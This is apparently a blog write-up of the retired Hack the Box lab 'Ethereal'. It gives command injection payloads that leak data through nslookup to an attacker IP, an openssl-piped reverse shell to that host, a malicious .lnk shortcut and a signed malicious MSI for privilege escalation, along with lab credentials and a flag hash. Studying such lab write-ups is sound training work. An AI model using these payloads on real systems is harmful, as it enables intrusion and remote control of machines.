HTB – Ethereal

Today we are going to solve another CTF challenge “Ethereal”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Insane

Task: To find user.txt and root.txt file

Note: Since these labs are online available therefore they have a static IP. The IP of Access is 10.10.10.106.

Walkthrough

Let’s start off with scanning the network to find our target.

root@kali:~/htb/ethereal# nmap -sC -sV -oA nmap 10.10.10.106
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-02 13:49 EDT
Nmap scan report for ethereal.htb (10.10.10.106)
Host is up (0.11s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV IP 172.16.249.135 is not the same as 10.10.10.106
| ftp-syst: 
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 10.0
| http-methods: 
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ethereal
8080/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=ethereal.htb
| http-server-header: 
| Microsoft-HTTPAPI/2.0
|_ Microsoft-IIS/10.0
|_http-title: 401 - Unauthorized: Access is denied due to invalid credentials.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.80 seconds

. 1. Use the anonymous account Anonymous login, you can find the FDISK.zip compressed file, switch the transfer mode to binary before downloading, otherwise it is often because Network factor causes download failure

root@kali:~/htb/ethereal# wget --no-passive-ftp -m ftp://anonymous:anonymous@10.10.10.106
Ftp server

2. Unzip FDISK.zip and get an image file. After identifying with the file command, it was found to be a disk in FAT format. Use mount -t vfat /root/FDISK /mnt/htbdisk to mount the disk and extract the two files pbox.dat and pbox.exe. Install the xp virtual machine and double-click to run pbox.exe and find that this is a 16-bit application and cannot run directly.

Pbox.exe

win32.16-bit program simulator is very easy to find, DosBox is currently the most famous one, many arcade games can run, such as Prince of Persia, tank wars,enter pbox first hanging

4. This may be a version compatibility issue. Fortunately, DosBox (apt-get install dosbox) can be installed in the kali environment, but due to the Dos protection mode, a similar < no DPMI – Get csdpmi*b.zip may be reported. > error. Solution can refer to: https://www.linuxtopia.org/online_books/linux_tool_guides/the_sed_faq/sedfaq5_004.html The core of solving the problem is to download CWSDPMI.EXE and then throw it into the pbox.exe directory, you can run pbox.exe normally.

5. The password entered is password. After entering, it is a database. You can see the related content by clicking the corresponding table item, from which you can export a bunch of user name and password. The valid combination is:

user: alan
password: !C414m17y57r1k3s4g41n!

Pbox database

6. The obtained username and password can be used to log in to port 8080. This is a Test Connection page. According to the Ping Address prompt, it is not difficult to think of this as a command injection vulnerability.

8080 port login

7. The problem that needs to be solved is how to view the echo. In the Linux environment, the ping-p is commonly used, but the ping command of windows does not have the -p option, so the only thing that can be used is the nslookup command, which is combined with the tokens parameter. The result of the command, you also need to use the for loop of the cmd script to feedback the results, for example, I need to look at the second line of netstat -ano results, that is, all ip and port results, the command entered in the web is:

127.0.0.1 | for / f "tokens=2" %I in ('netstat -ano') do nslookup %I 10.10.8.20

About the for /f script loop body can be seen https://www.youtube.com/watch?v=jMS6LkMdAHI
need Note that the tokens parameter can be cascaded. For example, I want to see the 1 to 6 lines of the result. I only need to add tokens=1, 2, 3, 4, 5, 6 and the corresponding placeholder %a.%b.%c. %d.%e.%f can be as follows:
127.0.0.1 | for /f “tokens=1,2,3,4,5,6” %a in (‘type c:\xxxxx.txt’) do nslookup %a.%b.%c.%d.%e.%f 10.10.8.8
After executing command injection on the web, it is possible to start tcpdump or wireshark. Filter dns to see the command echo: (below) Running tasklist because nslookup is failing It performs 2 queries, so the results will be repeated)

Wireshark capture results

8. Enumerate the firewall rules, netsh advfirewall firewall show rule name=all is the command to view the windows firewall rules, but can not be executed normally in the RCE environment, so you need to find a writable path, dump the results into a file, and then Use the type method to retrieve the content. Usually the c:\users\public directory is the path with the lowest privilege, but the direct write is a failure. Try to use the icacls command to enumerate the directory permissions. Finally, the current user alan can be written to C:\users\public\desktop\ Shortcuts\, eventually read the firewall configuration: only TCP 73 and 136 ports are allowed to communicate.
Enumeration permissions:

On the ping page, I tried to do the ‘netsh advfirewall firewall show rule name=all’ but piping that to an nslookup will always crash the webpage, so
I did the following instead

127.0.0.1 & netsh advfirewall firewall show rule name=all|findstr "Rule Name:"|findstr "Allow" > C:\users\public\desktop\shortcuts\firewall.rulename.allow

This will generate a file called firewall.rulename.allow and it is stored in a subfolder under public, that is a folder  Ethereal\Alan has write access to).
Now we read the file using the method above, We display the firewall rule names

127.0.0.1 & for /f "tokens=1,2,3,4,5,6,7,8" %a in ('type c:\users\public\desktop\shortcuts\firewall.rulename.allow') do nslookup %a.%b.%c.%d.%e.%f.%g.%h 10.10.14.20

result:

root@kali:~/htb/ethereal# responder -I tun0
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.20]
Challenge set [random]
Don't Respond To Names ['ISATAP']

[+] Listening for events...
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.ICMP.Reply
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.ICMP.Request
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.UDP.Port.53
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.TCP.Ports.73.136
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.Port.80.8080
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.ICMP.Request
[*] [DNS] Poisoned answer sent to: 10.10.10.106 Requested name: .Rule.Name.Allow.ICMP.Reply

Continue to search for clues in the system, use dir to retrieve the C drive, and finally find the Openssl-v1.1.0 version installed in the C:\Program Files (x86) directory, we will use it to implement the shell.
A command that displays a more complete dir result:

127.0.0.1 & cmd.exe /V /C "for /f " delims= " %e in ('DIR /B C:\') do cmd /c nslookup -querytype=A %e.a.a 10.10.14.20"

10. The CS working mode of openssl is not familiar to me, so first build the simulation environment locally, the official website https://www.openssl.org can check the command parameters, and download the source code, but there is no installation package. The installation packages for each version can be downloaded at http://slproweb.com/products/Win32OpenSSL.html . The installation process is all the way to the next.

Openssl for windows

11. On the kali side, first set up the openssl server. You need a private key and a certificate, so run the command:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
then have some Certificate information needs to be filled in, free to do it, format is no problem, such as e-mail, country shorthand
For questions about command parameters, please refer to the IBM documentation:
https://www.ibm.com/support/knowledgecenter/en/SSWHYP_4.0.0 /com.ibm.apimgmt.cmc.doc/task_apionprem_gernerate_self_signed_openSSL.html

Generate certificate

12. Using openssl’s s_client to connect to the server, the test in the simulation environment found that the work of openssl is somewhat like the nc without the -e option, what you input, what the other party displays, and can not execute the command. It is conceivable to use the pipe character to redirect input and output, that is, to redirect an openssl connection to cmd.exe via the pipe character “|”, and then use a pipe character “|” to redirect the operation result to openssl. A connection. In short:
openssl s_client 1 —->input | cmd.exe | openssl s_client 2 —->output
This is why firewall rules are going to release two ports.
The RCE command that translates to the web side is:

127.0.0.1 & START "" cmd /c "C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.20:73 | cmd.exe |C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.20:136"
Note that in the actual attack target, we have to open two terminals at the same time, one openssl server 73 and another openssl Server 136, server listening command:
openssl s_server -quiet -key key.pem -cert cert.pem -port 73
openssl s_server -quiet -key key.pem -cert cert.pem -port 136
I enter in port 73 port Command and press Enter, then submit the above RCE command on the web side to push the input into the pipeline, and view the result in the terminal of port 136.
13. After getting a low-privileged shell, we can get the next step in the c:\users\alan\Desktop path. He told us that there is a VS shortcut in the Public Desktop path, let us use it.
Lead file

14. Create  a malicious lnk shortcut  with powershell

PS C:\Users\jacco> $WScript = New-Object -ComObject 'wscript.shell'
PS C:\Users\jacco $SC = $WScript.CreateShortcut('Puckie.lnk')
PS C:\Users\jacco $SC


FullName : C:\Users\jacco\Puckie.lnk
Arguments :
Description :
Hotkey :
IconLocation : ,0
RelativePath :
TargetPath :
WindowStyle : 1
WorkingDirectory :

PS C:\pentest> $SC.TargetPath="C:\windows\system32\cmd.exe"
PS C:\pentest> $SC.Arguments="/c c:\progra~2\openssl-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.20:73 | cm
d c:\progra~2\openssl-v1.1.0/bin\openssl.exe s_client -connect 10.10.14.20:136"
PS C:\Users\jacco $SC

FullName : C:\Users\jacco\Puckie.lnk
Arguments : /c c:\progra~2\openssl-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.20:73 | cmd
c:\progra~2\openssl-v1.1.0/bin\openssl.exe s_client -connect 10.10.14.20:136
Description :
Hotkey :
IconLocation : ,0
RelativePath :
TargetPath : C:\Windows\System32\cmd.exe
WindowStyle : 1
WorkingDirectory :

PS C:\Users\jacco> $SC.Save()
PS C:\Users\jacco> dir C:\users\jacco\*.lnk

Directory: C:\users\jacco

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/4/2019 7:39 PM 1219 Puckie.lnk

The malicious shortcuts are as follows, you can see the commands that need to be executed at the shortcut target bar.

15. Upload a malicious shortcut and override c:\users\public\desktop\shortcuts\Visual Studio 2017.lnk. Note that uploading a .lnk file directly may fail and can be renamed to a .txt suffix upload. The upload process also utilizes the pipeline, but the original connection must be disconnected first.

Kali Run: openssl s_server -quiet -key key.pem -cert cert.pem -port 73 < malicious.txt
web run: 10.10.14.20|C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.20:73 > c:\users\public\desktop\shortcuts\out.txt (note that the suffix is ​​changed after the upload is successful)
Re-establish the shell connection
shell run: del “c:\users\public\desktop \shortcuts\Visual Studio 2017.lnk” & copy “c:\users\public\desktop\shortcuts\out.lnk” “c:\users\public\desktop\shortcuts\Visual Studio 2017.lnk”

16. Soon to get a new shell, in this shell, do not need to rely on the web, you can directly enter in 73, view the results in 136, the operation is smooth, a lot of user.txt in the jorge user desktop
User.txt

17. Continue to search. You can find that there are two suspicious folders on the D drive, one is Certs, which contains the certificate file, and the other is the DEV folder, which stores another clue file. This clue is well understood. As long as a malicious msi installation package is generated and placed in this path, the Rupal user will come to the point and combine the certificate file. This is probably to generate a signed msi.

Lead file 2

18. Direct type certificate files will be garbled and cannot be copied. At present, we do not have a download channel, so I thought of using the base64 encoding function of openssl to print out the content, the command is as follows:
C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe base64 -in MyCA.cer
C: \Progra~2\OpenSSL-v1.1.0\bin\openssl.exe base64 -in MyCA.pvk copies
the base64 encoded text to kali and restores it with base64 -d decoding.

Obtain a certificate

19. Generate msi, we use the graphical interface of the EMCO MSI Package Builder to operate. First create a new project, then click Custom Actions, right-click on the new Pre-Post Actions button, and fill in the key parameters to create the MSI Package. (The password is left blank)

Malicious msi generation

20. Sign the msi with the downloaded certificate. This requires .NET Framework 4 and winsdk, which can be downloaded at:
.NET Framework 4: https://www.microsoft.com/en-us/download/details.aspx?id=17851
winsdk: https: //www.microsoft.com/en-us/download/confirmation.aspx?id=8279 Once
installed, you can start signing. The commands are as follows:
makecert -n “CN=Ethereal” -pe -cy end -ic C:\MyCA.cer -iv C:\MyCA.pvk -sky signature -sv C:\hack.pvk C:\hack.cer
pvk2pfx -pvk C:\hack.pvk -spc C:\hack.cer -pfx C:\hack.pfx
signtool sign /f C:\hack.pfx C:\shell.msi
If the signature is successful, you can see the following prompt:

Successful signature

21. Upload the signed msi to d:\dev\msis\shell.msi, then exit the two openssl connections of 73 and 136 and listen to them again. In about 1 minute, the rupal user’s shell will go online. Read root.txt in his Desktop path

1cb6f1fc220e3f2fcc0e3cd8e2d9906f

22. If the deployment of msi is not successful, you need to try the second time. You must regenerate an msi and sign the upload. Because the installed msi is already registered in the system, it will not run again. You can add it from the control panel. I saw them in the removal program, but now in this environment we have no way to uninstall the msi installed before.

Author : Jacco Straathof
Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *